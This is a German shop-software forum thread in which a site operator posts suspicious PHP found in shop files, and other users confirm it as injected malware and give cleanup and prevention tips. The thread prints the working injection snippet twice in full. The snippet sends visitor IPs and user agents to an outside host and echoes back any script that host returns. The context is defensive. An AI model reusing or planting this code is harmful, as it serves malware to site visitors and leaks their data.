Neuigkeiten
  • Die modified eCommerce Shopsoftware ist kostenlos, aber nicht umsonst.
    Spenden
  • Damit wir die modified eCommerce Shopsoftware auch zukünftig kostenlos anbieten können:
    Spenden
  • Thema: Schadcode oder nicht?

    Chopper-Fahrer

    • Mitglied
    • Beiträge: 195
    • Geschlecht:
    Schadcode oder nicht?
    am: 15. Juli 2014, 10:21:23
    Mein Virenprogramm springt an, wenn ich auf einen von mir verwalteten Shop gehe.

    Leider finde ich den Schadcode nicht wirklich. Habe nur folgenden Code gefunden, der mir komisch vorkommt.

    includes/modules/default.php

    ganz unten

    Code: PHP  [Auswählen]
    <?php
    #405639#
    error_reporting(0); ini_set('display_errors',0); $wp_l6638 = @$_SERVER['HTTP_USER_AGENT'];

    if (( preg_match ('/Gecko|MSIE/i', $wp_l6638) && !preg_match ('/bot/i', $wp_l6638))){

    $wp_l096638="http://"."http"."title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_l6638);

    $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l096638);

    curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6638l = curl_exec ($ch); curl_close($ch);}

    if ( substr($wp_6638l,1,3) === 'scr' ){ echo $wp_6638l; }
    #/405639#
    ?>
    <?php

    ?>

    Gehört der Code da rein??
    Denn in alten Dateiversionen habe ich das nicht gefunden. Weiß aber nicht ob das durch irgendein Update mal geändert wurde und der Code nun hier reingehört. Zumal ich ähnlichen Code auch in anderen Dateien nun finde

    Linkback: https://www.modified-shop.org/forum/index.php?topic=30636.0

    Modulfux

    • Experte
    • Beiträge: 3.590
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #1 am: 15. Juli 2014, 10:24:43
    Nee, du hast den Schadcode damit gefunden. Schaue bitte gleichzeitig in allen Dateien, die auf .js enden und auch in alle Dateien, welche mit index, start und default anfangen.

    Gruß
    Ronny

    Chopper-Fahrer

    • Mitglied
    • Beiträge: 195
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #2 am: 15. Juli 2014, 10:31:35
    Danke!

    Auf was muss ich da genau achten in den Dateien, wie erkenne ich den Schadcode am schnellsten?

    in der general.js.php sieht der so aus

    Code: PHP  [Auswählen]
    <?php
    #7dbd6b#
    error_reporting(0); ini_set('display_errors',0); $wp_l6638 = @$_SERVER['HTTP_USER_AGENT'];

    if (( preg_match ('/Gecko|MSIE/i', $wp_l6638) && !preg_match ('/bot/i', $wp_l6638))){

    $wp_l096638="http://"."http"."title".".com/title"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_l6638);

    $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_l096638);

    curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6638l = curl_exec ($ch); curl_close($ch);}

    if ( substr($wp_6638l,1,3) === 'scr' ){ echo $wp_6638l; }
    #/7dbd6b#
    ?>


    <?php

    Muß ich am besten nach "wp_6638" suchen?

    ado

    • Fördermitglied
    • Beiträge: 195
    Re: Schadcode oder nicht?
    Antwort #3 am: 15. Juli 2014, 10:37:36
    Jau, auch befallen.

    Am Besten ein komplettes Backup machen.

    Ansonsten (suboptimal) kannst Du auch mit dem FTP-Programm alle Verzeichnisse durchgehen und Dir die files nach Alter sortiert anschauen - die mit dem Virus sind die "jungen".

    Auch files mit den Namen header, admin, werden gern genommen.

    Gruß
    ado

    Chopper-Fahrer

    • Mitglied
    • Beiträge: 195
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #4 am: 15. Juli 2014, 11:04:10
    Vielen Dank für Hilfe, Backup nicht zur Hand, deshalbmuss ich es von Hand machen.
    Wäre halt mal interessant an was man die Schadcodes am besten/schnellsten erkennt und wie man es verhindern kann das sich ständig solche Sachen einnisten

    ShopNix

    • Viel Schreiber
    • Beiträge: 1.208
    Re: Schadcode oder nicht?
    Antwort #5 am: 15. Juli 2014, 11:18:44
    Den Kameraden habe ich mehrfach gefunden, allerdings nur im Template-Cache, und erst nachdem der jeweilige Provider bereits Schadcode aus .js-Files entfernt hatte.

    Ein paar Hinweise kann ich Dir geben:

    Die Variablen-Namen und der Kommentar, der wie ein Farbcode aussieht, war unterschiedlich. Auch die URL war eine andere.

    Der Code-Schnipsel telefoniert nur nach Hause, der eigentliche Schadcode war angeblich in .js-Files

    astaller

    • Fördermitglied
    • Beiträge: 686
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #6 am: 15. Juli 2014, 13:42:35
    Hallo,

    fürs nächste mal: MODUL: Prüfsummenscanner Deutsch / English

    Damit siehst du dann recht schnell welche Dateien geändert wurden.
    Wichtig ist nur, wenn du zwischendruch selbst Dateien änderst, musst eine neue Prüfsumme generieren lassen.

    MfG
    Achim S.

    burrito

    • Viel Schreiber
    • Beiträge: 535
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #7 am: 15. Juli 2014, 15:21:04
    ... und wie man es verhindern kann das sich ständig solche Sachen einnisten

    Nun ich hoffe doch, dass sich "solche Sachen" bei Dir nicht ständig einnisten!

    Der häufigste Einfallsweg ist der Rechner von dem aus Du per FTP auf Deinen Web-Space zugreifst.

    Also:
    1. Von garantiert gesundem (Virenscanner laufen lassen!) Rechner aus FTP- und DB-Passwort ändern.
    2. Verdächtiger Rechner ausführlich mit Virenscanner prüfen.
    3. Wenn Du Filezilla verwendest, dann Passwort nicht speichern oder besser auf anderes FTP-Programm (z. B. WinScp) umsteigen. (Filzilla speichert dein Passwort im Klartext auf der Festplatte)
    4. Weitere Tipps beachten!

    burrito

    ado

    • Fördermitglied
    • Beiträge: 195
    Re: Schadcode oder nicht?
    Antwort #8 am: 15. Juli 2014, 21:22:23
    Übrigens .....

    ich wollte mir mal die früheren Beiträge vom Chopper-Fahrer ansehen, weil ich war eben neugierig.

    Und was passiert, wenn man auf das Profil vom Chopper-Fahrer geht und dann auf "Beiträge anzeigen klickt?

    Das hier : (siehe unten)

    Du scheinst ernste Probleme zu haben, Chopper.

    Gruß ado

    PS: bei anderen Profilen is alles okay

    Christian|PCE

    • Mitglied
    • Beiträge: 207
    • Geschlecht:
    Re: Schadcode oder nicht?
    Antwort #9 am: 15. Juli 2014, 21:42:38
    Nein Ado, das Problem liegt woanders. In der Beitragsliste ist ein Iframe-Codeschnipsel mit infizierter JS Datei eingebettet, deshalb tickt dein Avast aus. Am Forum liegt es nicht, wenn wären dann alle betroffen ;)

    ado

    • Fördermitglied
    • Beiträge: 195
    Re: Schadcode oder nicht?
    Antwort #10 am: 15. Juli 2014, 21:55:34
    ja na klar!  :datz:

    Sorry
    46 Antworten
    23466 Aufrufe
    07. Januar 2016, 13:55:56 von cplasa
    4 Antworten
    2827 Aufrufe
    27. November 2012, 12:03:34 von h-h-h
    6 Antworten
    4109 Aufrufe
    27. Juni 2016, 14:10:39 von andrewx
               
    anything